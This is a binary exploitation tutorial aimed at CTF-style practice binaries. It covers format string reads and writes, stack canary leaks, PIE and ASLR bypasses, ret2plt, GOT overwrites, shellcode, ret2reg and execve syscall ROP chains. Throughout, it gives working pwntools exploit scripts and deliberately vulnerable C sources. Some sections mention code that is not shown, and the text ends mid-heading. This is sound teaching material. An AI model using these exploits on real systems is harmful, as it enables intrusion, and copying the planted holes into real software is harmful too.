In C, when you want to use a string you use a pointer to the start of the string - this is essentially a value that represents a memory address. So when you use the %s format specifier, it's the pointer that gets passed to it. That means instead of reading a value of the stack, you read the value in the memory address it points at.

Now this is all very interesting - if you can find a value on the stack that happens to correspond to where you want to read, that is. But what if we could specify where we want to read? Well... we can.

Let's look back at the previous program and its output:

$ ./test

%x %x %x %x %x %x
f7f74080 0 5657b1c0 782573fc 20782520 25207825

You may notice that the last two values contain the hex values of %x . That's because we're reading the buffer. Here it's at the 4th offset - if we can write an address then point %s at it, we can get an arbitrary write!

$ ./vuln 

ABCD|%6$p
ABCD|0x44434241

%p is a pointer; generally, it returns the same as %x just precedes it with a 0x which makes it stand out more

As we can see, we're reading the value we inputted. Let's write a quick pwntools script that write the location of the ELF file and reads it with %s - if all goes well, it should read the first bytes of the file, which is always \x7fELF. Start with the basics:

from pwn import *

p = process('./vuln')

payload = p32(0x41424344)
payload += b'|%6$p'

p.sendline(payload)
log.info(p.clean())

$ python3 exploit.py

[+] Starting local process './vuln': pid 3204
[*] b'DCBA|0x41424344'

Nice it works. The base address of the binary is 0x8048000, so let's replace the 0x41424344 with that and read it with %s:

from pwn import *

p = process('./vuln')

payload = p32(0x8048000)
payload += b'|%6$s'

p.sendline(payload)
log.info(p.clean())

It doesn't work.

The reason it doesn't work is that printf stops at null bytes, and the very first character is a null byte. We have to put the format specifier first.

from pwn import *

p = process('./vuln')

payload = b'%8$p||||'
payload += p32(0x8048000)

p.sendline(payload)
log.info(p.clean())

Let's break down the payload:

We add 4 | because we want the address we write to fill one memory address, not half of one and half another, because that will result in reading the wrong address
The offset is %8$p because the start of the buffer is generally at %6$p. However, memory addresses are 4 bytes long each and we already have 8 bytes, so it's two memory addresses further along at %8$p.

$ python3 exploit.py

[+] Starting local process './vuln': pid 3255
[*] b'0x8048000||||'

It still stops at the null byte, but that's not important because we get the output; the address is still written to memory, just not printed back.

Now let's replace the p with an s.

$ python3 exploit.py

[+] Starting local process './vuln': pid 3326
[*] b'\x7fELF\x01\x01\x01||||'

Of course, %s will also stop at a null byte as strings in C are terminated with them. We have worked out, however, that the first bytes of an ELF file up to a null byte are \x7fELF\x01\x01\x01.

Arbitrary Writes

Luckily C contains a rarely-used format specifier %n. This specifier takes in a pointer (memory address) and writes there the number of characters written so far. If we can control the input, we can control how many characters are written an also where we write them.

Obviously, there is a small flaw - to write, say, 0x8048000 to a memory address, we would have to write that many characters - and generally buffers aren't quite that big. Luckily there are other format string specifiers for that. I fully recommend you watch this video to completely understand it, but let's jump into a basic binary.

#include <stdio.h>

int auth = 0;

int main() {
    char password[100];

    puts("Password: ");
    fgets(password, sizeof password, stdin);
    
    printf(password);
    printf("Auth is %i\n", auth);

    if(auth == 10) {
        puts("Authenticated!");
    }
}

Simple - we need to overwrite the variable auth with the value 10. Format string vulnerability is obvious, but there's also no buffer overflow due to a secure fgets.

Work out the location of auth

As it's a global variable, it's within the binary itself. We can check the location using readelf to check for symbols.

$ readelf -s auth | grep auth
    34: 00000000     0 FILE    LOCAL  DEFAULT  ABS auth.c
    57: 0804c028     4 OBJECT  GLOBAL DEFAULT   24 auth

Location of auth is 0x0804c028.

Writing the Exploit

We're lucky there's no null bytes, so there's no need to change the order.

$ ./auth 

Password: 
%p %p %p %p %p %p %p %p %p
0x64 0xf7f9f580 0x8049199 (nil) 0x1 0xf7ff5980 0x25207025 0x70252070 0x20702520

Buffer is the 7th %p.

from pwn import *

AUTH = 0x804c028

p = process('./auth')

payload = p32(AUTH)
payload += b'|' * 6         # We need to write the value 10, AUTH is 4 bytes, so we need 6 more for %n
payload += b'%7$n'


print(p.clean().decode('latin-1'))
p.sendline(payload)
print(p.clean().decode('latin-1'))

And easy peasy:

[+] Starting local process './auth': pid 4045
Password: 

[*] Process './auth' stopped with exit code 0 (pid 4045)
(À\x04||||||
Auth is 10
Authenticated!

Pwntools

As you can expect, pwntools has a handy feature for automating %n format string exploits:

payload = fmtstr_payload(offset, {location : value})

The offset in this case is 7 because the 7th %p read the buffer; the location is where you want to write it and the value is what. Note that you can add as many location-value pairs into the dictionary as you want.

payload = fmtstr_payload(7, {AUTH : 10})

You can also grab the location of the auth symbol with pwntools:

elf = ELF('./auth')
AUTH = elf.sym['auth']

Check out the pwntools tutorials for more cool features

Stack Canaries

The Buffer Overflow defence

Stack Canaries are very simple - at the beginning of the function, a random value is placed on the stack. Before the program executes ret, the current value of that variable is compared to the initial: if they are the same, no buffer overflow has occurred.

If they are not, the attacker attempted to overflow to control the return pointer and the program crashes, often with a ***stack smashing detected*** error message.

On Linux, stack canaries end in 00. This is so that they null-terminate any strings in case you make a mistake when using print functions, but it also makes them much easier to spot.

Bypassing Canaries

There are two ways to bypass a canary.

Leaking it

This is quite broad and will differ from binary to binary, but the main aim is to read the value. The simplest option is using format string if it is present - the canary, like other local variables, is on the stack, so if we can leak values off the stack it's easy.

Source

#include <stdio.h>

void vuln() {
    char buffer[64];

    puts("Leak me");
    gets(buffer);

    printf(buffer);
    puts("");

    puts("Overflow me");
    gets(buffer);
}

int main() {
    vuln();
}

void win() {
    puts("You won!");
}

The source is very simple - it gives you a format string vulnerability, then a buffer overflow vulnerability. The format string we can use to leak the canary value, then we can use that value to overwrite the canary with itself. This way, we can overflow past the canary but not trigger the check as its value remains constant. And of course, we just have to run win().

32-bit

First let's check there is a canary:

$ pwn checksec vuln-32 
[*] 'vuln-32'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

Yup, there is. Now we need to calculate at what offset the canary is at, and to do this we'll use radare2.

$ r2 -d -A vuln-32

[0xf7f2e0b0]> db 0x080491d7
[0xf7f2e0b0]> dc
Leak me
%p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
0xffd7cd60  0xffd7cd7c 0xffd7cdec 0x00000002 0x0804919e  |...............
0xffd7cd70  0x08048034 0x00000000 0xf7f57000 0x00007025  4........p..%p..
0xffd7cd80  0x00000000 0x00000000 0x08048034 0xf7f02a28  ........4...(*..
0xffd7cd90  0xf7f01000 0xf7f3e080 0x00000000 0xf7d53ade  .............:..
0xffd7cda0  0xf7f013fc 0xffffffff 0x00000000 0x080492cb  ................
0xffd7cdb0  0x00000001 0xffd7ce84 0xffd7ce8c 0xadc70e00  ................

The last value there is the canary. We can tell because it's roughly 64 bytes after the "buffer start", which should be close to the end of the buffer. Additionally, it ends in 00 and looks very random, unlike the libc and stack addresses that start with f7 and ff. If we count the number of address it's around 24 until that value, so we go one before and one after as well to make sure.

$./vuln-32

Leak me
%23$p %24$p %25$p
0xa4a50300 0xf7fae080 (nil)

It appears to be at %23$p. Remember, stack canaries are randomised for each new process, so it won't be the same.

Now let's just automate grabbing the canary with pwntools:

from pwn import *

p = process('./vuln-32')

log.info(p.clean())
p.sendline('%23$p')

canary = int(p.recvline(), 16)
log.success(f'Canary: {hex(canary)}')

$ python3 exploit.py 
[+] Starting local process './vuln-32': pid 14019
[*] b'Leak me\n'
[+] Canary: 0xcc987300

Now all that's left is work out what the offset is until the canary, and then the offset from after the canary to the return pointer.

$ r2 -d -A vuln-32
[0xf7fbb0b0]> db 0x080491d7
[0xf7fbb0b0]> dc
Leak me
%23$p
hit breakpoint at: 80491d7
[0x080491d7]> pxw @ esp
[...]
0xffea8af0  0x00000001 0xffea8bc4 0xffea8bcc 0xe1f91c00

We see the canary is at 0xffea8afc. A little later on the return pointer (we assume) is at 0xffea8b0c. Let's break just after the next gets() and check what value we overwrite it with (we'll use a De Bruijn pattern).

[0x080491d7]> db 0x0804920f
[0x080491d7]> dc
0xe1f91c00
Overflow me
AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAhAAiAAjAAkAAlAAmAAnAAoAApAAqAArAAsAAtAAuAAvAAwAAxAAyAAzAA1AA2AA3AA4AA5AA6AA7AA8AA9AA0ABBABCABDABEABFA
hit breakpoint at: 804920f
[0x0804920f]> pxw @ 0xffea8afc
0xffea8afc  0x41574141 0x41415841 0x5a414159 0x41614141  AAWAAXAAYAAZAAaA
0xffea8b0c  0x41416241 0x64414163 0x41654141 0x41416641  AbAAcAAdAAeAAfAA

Now we can check the canary and EIP offsets:

[0x0804920f]> wopO 0x41574141
64
[0x0804920f]> wopO 0x41416241
80

Return pointer is 16 bytes after the canary start, so 12 bytes after the canary.

from pwn import *

p = process('./vuln-32')

log.info(p.clean())
p.sendline('%23$p')

canary = int(p.recvline(), 16)
log.success(f'Canary: {hex(canary)}')

payload = b'A' * 64
payload += p32(canary)  # overwrite canary with original value to not trigger
payload += b'A' * 12    # pad to return pointer
payload += p32(0x08049245)

p.clean()
p.sendline(payload)

print(p.clean().decode('latin-1'))

64-bit

Same source, same approach, just 64-bit. Try it yourself before checking the solution.

Remember, in 64-bit format string goes to the relevant registers first and the addresses can fit 8 bytes each so the offset may be different.

Bruteforcing the Canary

This is possible on 32-bit, and sometimes unavoidable. It's not, however, feasible on 64-bit.

As you can expect, the general idea is to run the process loads and load of times with random canary values until you get a hit, which you can differentiate by the presence of a known plaintext, e.g. flag{ and this can take ages to run and is frankly not a particularly interesting challenge.

PIE

Position Independent Code

Overview

PIE stands for Position Independent Executable, which means that every time you run the file it gets loaded into a different memory address. This means you cannot hardcode values such as function addresses and gadget locations without finding out where they are.

Analysis

Luckily, this does not mean it's impossible to exploit. PIE executables are based around relative rather than absolute addresses, meaning that while the locations in memory are fairly random the offsets between different parts of the binary remain constant. For example, if you know that the function main is located 0x128 bytes in memory after the base address of the binary, and you somehow find the location of main, you can simply subtract 0x128 from this to get the base address and from the addresses of everything else.

Exploitation

So, all we need to do is find a single address and PIE is bypassed. Where could we leak this address from?

The stack of course!

We know that the return pointer is located on the stack - and much like a canary, we can use format string (or other ways) to read the value off the stack. The value will always be a static offset away from the binary base, enabling us to completely bypass PIE!

Double-Checking

Due to the way PIE randomisation works, the base address of a PIE executable will always end in the hexadecimal characters 000. This is because pages are the things being randomised in memory, which have a standard size of 0x1000. Operating Systems keep track of page tables which point to each section of memory and define the permissions for each section, similar to segmentation.

Checking the base address ends in 000 should probably be the first thing you do if your exploit is not working as you expected.

Pwntools, PIE and ROP

As shown in the pwntools ELF tutorial, pwntools has a host of functionality that allows you to really make your exploit dynamic. Simply setting elf.address will automatically update all the function and symbols addresses for you, meaning you don't have to worry about using readelf or other command line tools, but instead can receive it all dynamically.

Not to mention that the ROP capabilities are incredibly powerful as well.

PIE Bypass with Given Leak

Exploiting PIE with a given leak

The Source

Pretty simple - we print the address of main, which we can read and calculate the base address from. Then, using this, we can calculate the address of win() itself.

Analysis

Let's just run the script to make sure it's the right one :D

Yup, and as we expected, it prints the location of main.

Exploitation

First, let's set up the script. We create an ELF object, which becomes very useful later on, and start the process.

Now we want to take in the main function location. To do this we can simply receive up until it (and do nothing with that) and then read it.

Since we received the entire line except for the address, only the address will come up with p.recvline().

Now we'll use the ELF object we created earlier and set its base address. The sym dictionary returns the offsets of the functions from binary base until the base address is set, after which it returns the absolute address in memory.

In this case, elf.sym['main'] will return 0x11b9; if we ran it again, it would return 0x11b9 + the base address. So, essentially, we're subtracting the offset of main from the address we leaked to get the base of the binary.

Now we know the base we can just call win().

By this point, I assume you know how to find the padding length and other stuff we've been mentioning for a while, so I won't be showing you every step of that.

And does it work?

Awesome!

Final Exploit

Summary

From the leak address of main, we were able to calculate the base address of the binary. From this we could then calculate the address of win and call it.

And one thing I would like to point out is how simple this exploit is. Look - it's 10 lines of code, at least half of which is scaffolding and setup.

64-bit

Try this for yourself first, then feel free to check the solution. Same source, same challenge.

PIE Bypass

Using format string

The Source

Unlike last time, we don't get given a function. We'll have to leak it with format strings.

Analysis

Everything's as we expect.

Exploitation

Setup

As last time, first we set everything up.

PIE Leak

Now we just need a leak. Let's try a few offsets.

3rd one looks like a binary address, let's check the difference between the 3rd leak and the base address in radare2. Set a breakpoint somewhere after the format string leak (doesn't really matter where).

We can see the base address is 0x565ef000 and the leaked value is 0x565f01d5. Therefore, subtracting 0x1d5 from the leaked address should give us the binary. Let's leak the value and get the base address.

Now we just need to send the exploit payload.

Final Exploit

64-bit

Same deal, just 64-bit. Try it out :)

ASLR

Address Space Layout Randomisation

Overview

ASLR stands for Address Space Layout Randomisation and can, in most cases, be thought of as libc's equivalent of PIE - every time you run a binary, libc (and other libraries) get loaded into a different memory address.

While it's tempting to think of ASLR as libc PIE, there is a key difference.

ASLR is a kernel protection while PIE is a binary protection. The main difference is that PIE can be compiled into the binary while the presence of ASLR is completely dependant on the environment running the binary. If I sent you a binary compiled with ASLR disabled while I did it, it wouldn't make any different at all if you had ASLR enabled.

Of course, as with PIE, this means you cannot hardcode values such as function address (e.g. system for a ret2libc).

The Format String Trap

It's tempting to think that, as with PIE, we can simply format string for a libc address and subtract a static offset from it. Sadly, we can't quite do that.

When functions finish execution, they do not get removed from memory; instead, they just get ignored and overwritten. Chances are very high that you will grab one of these remnants with the format string. Different libc versions can act very differently during execution, so a value you just grabbed may not even exist remotely, and if it does the offset will most likely be different (different libcs have different sizes and therefore different offsets between functions). It's possible to get lucky, but you shouldn't really hope that the offsets remain the same.

Instead, a more reliable way is reading the GOT entry of a specific function.

Double-Checking

For the same reason as PIE, libc base addresses always end in the hexadecimal characters 000.

ASLR Bypass with Given Leak

The Source

Just as we did for PIE, except this time we print the address of system.

Analysis

Yup, does what we expected.

Your address of system might end in different characters - you just have a different libc version

Exploitation

Much of this is as we did with PIE.

Note that we include the libc here - this is just another ELF object that makes our lives easier.

Parse the address of system and calculate libc base from that (as we did with PIE):

Now we can finally ret2libc, using the libc ELF object to really simplify it for us:

Final Exploit

64-bit

Try it yourself :)

Using pwntools

If you prefer, you could have changed the following payload to be more pwntoolsy:

Instead, you could do:

The benefit of this is it's (arguably) more readable, but also makes it much easier to reuse in 64-bit exploits as all the parameters are automatically resolved for you.

PLT and GOT

Bypassing ASLR

The PLT and GOT are sections within an ELF file that deal with a large portion of the dynamic linking. Dynamically linked binaries are more common than statically linked binary in CTFs. The purpose of dynamic linking is that binaries do not have to carry all the code necessary to run within them - this reduces their size substantially. Instead, they rely on system libraries (especially libc, the C standard library) to provide the bulk of the fucntionality. For example, each ELF file will not carry their own version of puts compiled within it - it will instead dynamically link to the puts of the system it is on. As well as smaller binary sizes, this also means the user can continually upgrade their libraries, instead of having to redownload all the binaries every time a new version comes out.

So when it's on a new system, it replaces function calls with hardcoded addresses?

Not quite.

The problem with this approach is it requires libc to have a constant base address, i.e. be loaded in the same area of memory every time it's run, but remember that ASLR exists. Hence the need for dynamic linking. Due to the way ASLR works, these addresses need to be resolved every time the binary is run. Enter the PLT and GOT.

The PLT and GOT

The PLT (Procedure Linkage Table) and GOT (Global Offset Table) work together to perform the linking.

When you call puts() in C and compile it as an ELF executable, it is not actually puts() - instead, it gets compiled as puts@plt. Check it out in GDB:

Why does it do that?

Well, as we said, it doesn't know where puts actually is - so it jumps to the PLT entry of puts instead. From here, puts@plt does some very specific things:

If there is a GOT entry for puts, it jumps to the address stored there.
If there isn't a GOT entry, it will resolve it and jump there.

The GOT is a massive table of addresses; these addresses are the actual locations in memory of the libc functions. puts@got, for example, will contain the address of puts in memory. When the PLT gets called, it reads the GOT address and redirects execution there. If the address is empty, it coordinates with the ld.so (also called the dynamic linker/loader) to get the function address and stores it in the GOT.

How is this useful for binary exploitation?

Well, there are two key takeaways from the above explanation:

Calling the PLT address of a function is equivalent to calling the function itself
The GOT address contains addresses of functions in libc, and the GOT is within the binary.

The use of the first point is clear - if we have a PLT entry for a desirable libc function, for example system, we can just redirect execution to its PLT entry and it will be the equivalent of calling system directly; no need to jump into libc.

The second point is less obvious, but debatably even more important. As the GOT is part of the binary, it will always be a constant offset away from the base. Therefore, if PIE is disabled or you somehow leak the binary base, you know the exact address that contains a libc function's address. If you perhaps have an arbitrary read, it's trivial to leak the real address of the libc function and therefore bypass ASLR.

Exploiting an Arbitrary Read

There are two main ways that I (personally) exploit an arbitrary read. Note that these approaches will cause not only the GOT entry to be return but everything else until a null byte is reached as well, due to strings in C being null-terminated; make sure you only take the required number of bytes.

ret2plt

A ret2plt is a common technique that involves calling puts@plt and passing the GOT entry of puts as a parameter. This causes puts to print out its own address in libc. You then set the return address to the function you are exploiting in order to call it again and enable you to

# 32-bit ret2plt
payload = flat(
    b'A' * padding,
    elf.plt['puts'],
    elf.symbols['main'],
    elf.got['puts']
)

# 64-bit
payload = flat(
    b'A' * padding,
    POP_RDI,
    elf.got['puts']
    elf.plt['puts'],
    elf.symbols['main']
)

flat() packs all the values you give it with p32() and p64() (depending on context) and concatenates them, meaning you don't have to write the packing functions out all the time

%s format string

This has the same general theory but is useful when you have limited stack space or a ROP chain would alter the stack in such a way to complicate future payloads, for example when stack pivoting.

payload = p32(elf.got['puts'])      # p64() if 64-bit
payload += b'|'
payload += b'%3$s'                  # The third parameter points at the start of the buffer


# this part is only relevant if you need to call the function again

payload = payload.ljust(40, b'A')   # 40 is the offset until you're overwriting the instruction pointer
payload += p32(elf.symbols['main'])

# Send it off...

p.recvuntil(b'|')                   # This is not required
puts_leak = u32(p.recv(4))          # 4 bytes because it's 32-bit

Summary

The PLT and GOT do the bulk of static linking
The PLT resolves actual locations in libc of functions you use and stores them in the GOT
- Next time that function is called, it jumps to the GOT and resumes execution there
Calling function@plt is equivalent to calling the function itself
An arbitrary read enables you to read the GOT and thus bypass ASLR by calculating libc base

ret2plt ASLR bypass

Overview

This time around, there's no leak. You'll have to use the ret2plt technique explained previously. Feel free to have a go before looking further on.

Analysis

We're going to have to leak ASLR base somehow, and the only logical way is a ret2plt. We're not struggling for space as gets() takes in as much data as we want.

Exploitation

All the basic setup

Now we want to send a payload that leaks the real address of puts. As mentioned before, calling the PLT entry of a function is the same as calling the function itself; if we point the parameter to the GOT entry, it'll print out it's actual location. This is because in C string arguments for functions actually take a pointer to where the string can be found, so pointing it to the GOT entry (which we know the location of) will print it out.

But why is there a main there? Well, if we set the return address to random jargon, we'll leak libc base but then it'll crash; if we call main again, however, we essentially restart the binary - except we now know libc base so this time around we can do a ret2libc.

Remember that the GOT entry won't be the only thing printed - puts, and most functions in C, print until a null byte. This means it will keep on printing GOT addresses, but the only one we care about is the first one, so we grab the first 4 bytes and use u32() to interpret them as a little-endian number. After that we ignore the the rest of the values as well as the Come get me from calling main again.

From here, we simply calculate libc base again and perform a basic ret2libc:

And bingo, we have a shell!

Final Exploit

64-bit

You know the drill - try the same thing for 64-bit. If you want, you can use pwntools' ROP capabilities - or, to make sure you understand calling conventions, be daring and do both :P

GOT Overwrite

Hijacking functions

You may remember that the GOT stores the actual locations in libc of functions. Well, if we could overwrite an entry, we could gain code execution that way. Imagine the following code:

Not only is there a buffer overflow and format string vulnerability here, but say we used that format string to overwrite the GOT entry of printf with the location of system. The code would essentially look like the following:

Bit of an issue? Yes. Our input is being passed directly to system.

Exploiting a GOT overwrite

Source

The very simplest of possible GOT-overwrite binaries.

Infinite loop which takes in your input and prints it out to you using printf - no buffer overflow, just format string. Let's assume ASLR is disabled - have a go yourself :)

Exploitation

As per usual, set it all up

Now, to do the %n overwrite, we need to find the offset until we start reading the buffer.

Looks like it's the 5th.

Yes it is!

Now, next time printf gets called on your input it'll actually be system!

If the buffer is restrictive, you can always send /bin/sh to get you into a shell and run longer commands.

Final Exploit

64-bit

You'll never guess. That's right! You can do this one by yourself.

ASLR Enabled

If you want an additional challenge, re-enable ASLR and do the 32-bit and 64-bit exploits again; you'll have to leverage what we've covered previously.

RELRO

Relocation Read-Only

RELRO is a protection to stop any GOT overwrites from taking place, and it does so very effectively. There are two types of RELRO, which are both easy to understand.

Partial RELRO

Partial RELRO simply moves the GOT above the program's variables, meaning you can't overflow into the GOT. This, of course, does not prevent format string overwrites.

Full RELRO

Full RELRO makes the GOT completely read-only, so even format string exploits cannot overwrite it. This is not the default in binaries due to the fact that it can make it take much longer to load as it need to resolve all the function addresses at once.

Reliable Shellcode

Shellcode, but without the guesswork

Utilising ROP

The problem with shellcode exploits as they are is that the locations of it are questionable - wouldn't it be cool if we could control where we wrote it to?

Well, we can.

Instead of writing shellcode directly, we can instead use some ROP to take in input again - except this time, we specify the location as somewhere we control.

Using ESP

If you think about it, once the return pointer is popped off the stack ESP will points at whatever is after it in memory - after all, that's the entire basis of ROP. But what if we put shellcode there?

It's a crazy idea. But remember, ESP will point there. So what if we overwrite the return pointer with a jmp esp gadget! Once it gets popped off, ESP will point at the shellcode and thanks to the jmp esp it will be executed!

ret2reg

ret2reg extends the use of jmp esp to the use of any register that happens to point somewhere you need it to.

ROP and Shellcode

Source

Super standard binary.

Exploitation

Let's get all the basic setup done.

Now we're going to do something interesting - we are going to call gets again. Most importantly, we will tell gets to write the data it receives to a section of the binary. We need somewhere both readable and writeable, so I choose the GOT. We pass a GOT entry to gets, and when it receives the shellcode we send it will write the shellcode into the GOT. Now we know exactly where the shellcode is. To top it all off, we set the return address of our call to gets to where we wrote the shellcode, perfectly executing what we just inputted.

Final Exploit

64-bit

I wonder what you could do with this.

ASLR

No need to worry about ASLR! Neither the stack nor libc is used, save for the ROP.

The real problem would be if PIE was enabled, as then you couldn't call gets as the location of the PLT would be unknown without a leak - same problem with writing to the GOT.

Potential Problems

Thank to and from the HackTheBox Discord server, I found out that the GOT often has Executable permissions simply because that's the default permissions when there's no NX. If you have a more recent kernel, such as 5.9.0, the default is changed and the GOT will not have X permissions.

As such, if your exploit is failing, run uname -r to grab the kernel version and check if it's 5.9.0; if it is, you'll have to find another RWX region to place your shellcode (if it exists!).

Using RSP

Source

You can ignore most of it as it's mostly there to accomodate the existence of jmp rsp - we don't actually want it called, so there's a negative if statement.

The chance of jmp esp gadgets existing in the binary are incredible low, but what you often do instead is find a sequence of bytes that code for jmp rsp and jump there - jmp rsp is \xff\xe4 in shellcode, so if there's is any part of the executable section with bytes in this order, they can be used as if they are a jmp rsp.

Exploitation

Try to do this yourself first, using the explanation on the previous page. Remember, RSP points at the thing after the return pointer once ret has occured, so your shellcode goes after it.

Solution

Limited Space

You won't always have enough overflow - perhaps you'll only have 7 or 8 bytes. What you can do in this scenario is make the shellcode after the RIP equivalent to something like

Where 0x20 is the offset between the current value of RSP and the start of the buffer. In the buffer itself, we put the main shellcode. Let's try that!

The 10 is just a placeholder. Once we hit the pause(), we attach with radare2 and set a breakpoint on the ret, then continue. Once we hit it, we find the beginning of the A string and work out the offset between that and the current value of RSP - it's 128!

Solution

We successfully pivoted back to our shellcode - and because all our addresses are relative, it's completely reliable! ASLR beaten with pure shellcode.

This is harder with PIE as the location of jmp rsp will change, so you might have to leak PIE base!

ret2reg

Using Registers to bypass ASLR

ret2reg simply involves jumping to register addresses rather than hardcoded addresses, much like Using RSP for Shellcode. For example, you may find RAX always points at your buffer when the ret is executed, so you could utilise a call rax or jmp rax to continue from there.

The reason RAX is the most common for this technique is that, by convention, the return value of a function is stored in RAX. For example, take the following basic code:

#include <stdio.h>

int test() {
    return 0xdeadbeef;
}

int main() {
    test();
    return 0;
}

If we compile and disassemble the function, we get this:

0x55ea94f68125      55             push rbp
0x55ea94f68126      4889e5         mov rbp, rsp
0x55ea94f68129      b8efbeadde     mov eax, 0xdeadbeef
0x55ea94f6812e      5d             pop rbp
0x55ea94f6812f      c3             ret

As you can see, the value 0xdeadbeef is being moved into EAX.

Using ret2reg

Source

Any function that returns a pointer to the string once it acts on it is a prime target. There are many that do this, including stuff like gets(), strcpy() and fgets(). We''l keep it simple and use gets() as an example.

#include <stdio.h>

void vuln() {
    char buffer[100];
    gets(buffer);
}

int main() {
    vuln();
    return 0;
}

Analysis

First, let's make sure that some register does point to the buffer:

$ r2 -d -A vuln

[0x7f8ac76fa090]> pdf @ sym.vuln 
            ; CALL XREF from main @ 0x401147
┌ 28: sym.vuln ();
│           ; var int64_t var_70h @ rbp-0x70
│           0x00401122      55             push rbp
│           0x00401123      4889e5         mov rbp, rsp
│           0x00401126      4883ec70       sub rsp, 0x70
│           0x0040112a      488d4590       lea rax, [var_70h]
│           0x0040112e      4889c7         mov rdi, rax
│           0x00401131      b800000000     mov eax, 0
│           0x00401136      e8f5feffff     call sym.imp.gets           ; char *gets(char *s)
│           0x0040113b      90             nop
│           0x0040113c      c9             leave
└           0x0040113d      c3             ret

Now we'll set a breakpoint on the ret in vuln(), continue and enter text.

[0x7f8ac76fa090]> db 0x0040113d
[0x7f8ac76fa090]> dc
hello
hit breakpoint at: 40113d

We've hit the breakpoint, let's check if RAX points to our register. We'll assume RAX first because that's the traditional register to use for the return value.

[0x0040113d]> dr rax
0x7ffd419895c0
[0x0040113d]> ps @ 0x7ffd419895c0
hello

And indeed it does!

Exploitation

We now just need a jmp rax gadget or equivalent. I'll use ROPgadget for this and look for either jmp rax or call rax:

$ ROPgadget --binary vuln | grep -iE "(jmp|call) rax"

0x0000000000401009 : add byte ptr [rax], al ; test rax, rax ; je 0x401019 ; call rax
0x0000000000401010 : call rax
0x000000000040100e : je 0x401014 ; call rax
0x0000000000401095 : je 0x4010a7 ; mov edi, 0x404030 ; jmp rax
0x00000000004010d7 : je 0x4010e7 ; mov edi, 0x404030 ; jmp rax
0x000000000040109c : jmp rax
0x0000000000401097 : mov edi, 0x404030 ; jmp rax
0x0000000000401096 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x000000000040100c : test eax, eax ; je 0x401016 ; call rax
0x0000000000401093 : test eax, eax ; je 0x4010a9 ; mov edi, 0x404030 ; jmp rax
0x00000000004010d5 : test eax, eax ; je 0x4010e9 ; mov edi, 0x404030 ; jmp rax
0x000000000040100b : test rax, rax ; je 0x401017 ; call rax

There's a jmp rax at 0x40109c, so I'll use that. The padding up until RIP is 120; I assume you can calculate this yourselves by now, so I won't bother showing it.

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

JMP_RAX = 0x40109c

payload = asm(shellcraft.sh())        # front of buffer <- RAX points here
payload = payload.ljust(120, b'A')    # pad until RIP
payload += p64(JMP_RAX)               # jump to the buffer - return value of gets()

p.sendline(payload)
p.interactive()

Awesome!

One Gadgets and Malloc Hook

Quick shells and pointers

A one_gadget is simply an execve("/bin/sh") command that is present in gLIBC, and this can be a quick win with GOT overwrites - next time the function is called, the one_gadget is executed and the shell is popped.

__malloc_hook is a feature in C. The Official GNU site defines __malloc_hook as:

The value of this variable is a pointer to the function that malloc uses whenever it is called.

To summarise, when you call malloc() the function __malloc_hook points to also gets called - so if we can overwrite this with, say, a one_gadget, and somehow trigger a call to malloc(), we can get an easy shell.

Finding One_Gadgets

Luckily there is a tool written in Ruby called one_gadget. To install it, run:

gem install one_gadget

And then you can simply run

one_gadget libc

For most one_gadgets, certain criteria have to be met. This means they won't all work - in fact, none of them may work.

Triggering malloc()

Wait a sec - isn't malloc() a heap function? How will we use it on the stack? Well, you can actually trigger malloc by calling printf("%10000$c") (this allocates too many bytes for the stack, forcing libc to allocate the space on the heap instead). So, if you have a format string vulnerability, calling malloc is trivial.

Practise

This is a hard technique to give you practise on, due to the fact that your libc version may not even have working one_gadgets. As such, feel free to play around with the GOT overwrite binary and see if you can get a one_gadget working.

Remember, the value given by the one_gadget tool needs to be added to libc base as it's just an offset.

Syscalls

Interfacing directly with the kernel

Overview

A syscall is a system call, and is how the program enters the kernel in order to carry out specific tasks such as creating processes, I/O and any others they would require kernel-level access.

Browsing the , you may notice that certain syscalls are similar to libc functions such as open(), fork() or read(); this is because these functions are simply wrappers around the syscalls, making it much easier for the programmer.

Triggering Syscalls

On Linux, a syscall is triggered by the int80 instruction. Once it's called, the kernel checks the value stored in RAX - this is the syscall number, which defines what syscall gets run. As per the table, the other parameters can be stored in RDI, RSI, RDX, etc and every parameter has a different meaning for the different syscalls.

Execve

A notable syscall is the execve syscall, which executes the program passed to it in RDI. RSI and RDX hold arvp and envp respectively.

This means, if there is no system() function, we can use execve to call /bin/sh instead - all we have to do is pass in a pointer to /bin/sh to RDI, and populate RSI and RDX with 0 (this is because both argv and envp need to be NULL to pop a shell).

Exploitation with Syscalls

The Source

To make it super simple, I made it in assembly using pwntools:

from pwn import *

context.arch = 'amd64'
context.os = 'linux'

elf = ELF.from_assembly(
    '''
        mov rdi, 0;
        mov rsi, rsp;
        sub rsi, 8;
        mov rdx, 300;
        syscall;
        ret;
        
        pop rax;
        ret;
        pop rdi;
        ret;
        pop rsi;
        ret;
        pop rdx;
        ret;
    '''
)
elf.save('vuln')

The binary contains all the gadgets you need! First it executes a read syscall, writes to the stack, then the ret occurs and you can gain control.

But what about the /bin/sh? I slightly cheesed this one and couldn't be bothered to add it to the assembly, so I just did:

echo -en "/bin/sh\x00" >> vuln

Exploitation

As we mentioned before, we need the following layout in the registers:

RAX:    0x3b
RDI:    pointer to /bin/sh
RSI:    0x0
RDX:    0x0

To get the address of the gadgets, I'll just do objdump -d vuln. The address of /bin/sh can be gotten using strings:

$ strings -t x vuln | grep bin
   1250 /bin/sh

The offset from the base to the string is 0x1250 (-t x tells strings to print the offset as hex). Armed with all this information, we can set up the constants:

from pwn import *

elf = context.binary = ELF('./vuln')
p = process()

binsh = elf.address + 0x1250

POP_RAX = 0x10000018
POP_RDI = 0x1000001a
POP_RSI = 0x1000001c
POP_RDX = 0x1000001e
SYSCALL = 0x10000015

Now we just need to populate the registers. I'll tell you the padding is 8 to save time:

payload = flat(
    'A' * 8,
    POP_RAX,
    0x3b,
    POP_RDI,
    binsh,
    POP_RSI,
    0x0,
    POP_RDX,
    0X0,
    SYSCALL
)

p.sendline(payload)
p.interactive()

And wehey - we get a shell!

Sigreturn-Oriented Programming (SROP)

Controlling all registers at once

Overview

